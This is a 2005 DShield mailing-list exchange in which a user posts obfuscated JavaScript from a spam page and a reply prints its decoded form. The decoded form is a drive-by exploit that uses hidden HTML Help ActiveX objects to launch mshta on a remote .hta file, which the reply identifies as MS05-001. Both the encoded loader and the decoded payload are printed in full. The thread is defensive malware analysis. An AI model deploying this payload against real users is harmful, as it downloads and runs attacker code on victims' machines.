[Dshield] Help Needed With Dissection of Exploit

joey nonoyjoey at gmail.com
Wed Aug 10 04:41:40 GMT 2005


after some wrangling with the encrypted code, it decrypts to the following:

<style>#x2,#x3{position:absolute;left:-1000;}</style>
<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<param name="Scrollbars" value="true">
<PARAM NAME="Item1"
VALUE="command;ms-its:icwdial.chm::/icw_overview.htm"></OBJECT>
<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<PARAM NAME="Item1"
VALUE="command;javascript:document.links[0].href='EXEC=,mshta,http://www.asdfgh.org/ppp.hta
 CHM=ieshared.chm
FILE=app_install.htm'%3Bdocument.links[0].click();"></OBJECT>


it seems that it is a CHM exploit (MS05-001 if i am not mistaken),
which will download the hta file

http:// www.asdfgh.org/ ppp.hta 


On 8/10/05, Nemo Omen <nemoaus at hotmail.com> wrote:
> I became aware of a new piece of spam last week. It tells me I can get bank
> account passwords and transfer some money into my account too. A deal too
> good to refuse. The address is http:/www.asdfgh.org/passwords.html  Don't
> load this site up unless you are happy to infect your machine or use a non
> m/s o/s.
> 
> The displayed page is pretty dull telling me that I need PGP to unencrypt
> the contents. Looking at the page source is more interesting. Below, I
> substituted javascript with XXX. It starts off with a Javascript
> document.write, I dont need to be very clever to determine that it is
> probably writing some sort of malware to my hard disk. I would like a bit of
> help in analysis of this malware.
> 
> 1) What is the name of this exploit?
> 
> 2) I dont know a whole lot about the javascript unescape function what it
> does?
> 
> 3) Are the %codes below machine opcodes or something else?
> 
> 4) What are the next steps in analysis of this malware?
> 
> Regards.  Nem
> 
> <script
> language=XXX>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286Fvw%7Coh%2
> 86H%2856%7B5%285F%2856%7B6%28%3AEsrvlwlrq%286Ddevroxwh%286Eohiw%286D04333%286E%28%3AG%286F2vw%7Coh%286H%283G%283D%286FREMHFW%2853lg%286G%7B5%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286Fsdudp%2853qdph%286G%2855Vfurooeduv%2855%2853ydoxh%286G%2855wuxh%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Epv0lwv%286Dlfzgldo1fkp%286D%286D2lfzbryhuylhz1kwp%2855%286H%286F2REMHFW%286H%283G%283D%286FREMHFW%2853lg%286G%7B6%2853fodvvlg%286Gfovlg%286Ddge%3B%3B3d90g%3Bii044fi0%3C6%3A%3A033dd336e%3Ad44%286H%283G%283D%286FSDUDP%2853QD
> PH%286G%2855Frppdqg%2855%2853YDOXH%286G%2855Uhodwhg%2853Wrslfv%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Exwwrq%2855%2853YDOXH%286G%2855Wh%7Bw%286D%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Zlqgrz%2855%2853YDOXH%286G%2855%2857joredobeodqn%2855%286H%283G%283D%286FSDUDP%2853QDPH%286G%2855Lwhp4%2855%2853YDOXH%286G%2855frppdqg%286Emdydvfulsw%286Dgrfxphqw1olqnv%288E3%288G1kuhi%286G%285%3AH%5BHF%286G%285Fpvkwd%285Fkwws%286D22zzz1dvgijk1ruj2sss1kwd%2853%2853FKP%286Glhvkduhg1fkp%2853ILOH%286Gdssblqvwdoo1kwp%285%3A%28586Egrfxphqw1olqnv%288E3%288G1folfn%285%3B%285%3C%286E%2855%286H%286F2REMHFW%286H%283G%283D%283G%283D%283%3C%283%3C%283%3C3')</script>
> 
> _________________________________________________________________
> Your opinion counts..for your chance to win a Mini Cooper click here
> http://www.qualifiedopinions.com/joinup.php?source=hotmail
> 
> 
> _______________________________________________
> send all posts to list at lists.dshield.org
> To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list
>



More information about the list mailing list